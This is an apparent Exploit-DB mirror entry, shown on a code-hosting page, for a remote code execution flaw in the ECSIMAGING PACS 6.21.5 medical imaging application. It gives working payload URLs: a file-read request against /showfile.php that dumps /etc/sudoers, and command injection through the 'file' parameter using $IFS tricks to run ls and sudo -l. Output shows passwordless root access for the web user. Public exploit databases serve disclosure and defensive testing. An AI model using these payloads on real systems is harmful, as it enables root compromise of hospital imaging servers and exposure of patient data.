bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/49388.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

23 lines
No EOL
772 B
Text
Raw Blame History

# Exploit Title: ECSIMAGING PACS 6.21.5 - Remote code execution
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
# Tested on: Linux
ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability.
The parameter "file" on the webpage /showfile.php can be exploited with simple OS injection to gain root access.
www-data user has sudo NOPASSWD access :
/showfile.php?file=/etc/sudoers
[...]
www-data ALL=NOPASSWD: ALL
[...]
Command injection can be realized with the $IFS tricks : <url>/showfile.php?file=;ls$IFS-la$IFS/
/showfile.php?file=;sudo$IFS-l
[...]
User www-data may run the following commands on this host:
(root) NOPASSWD: ALL
[...]
Reference in a new issue View git blame Copy permalink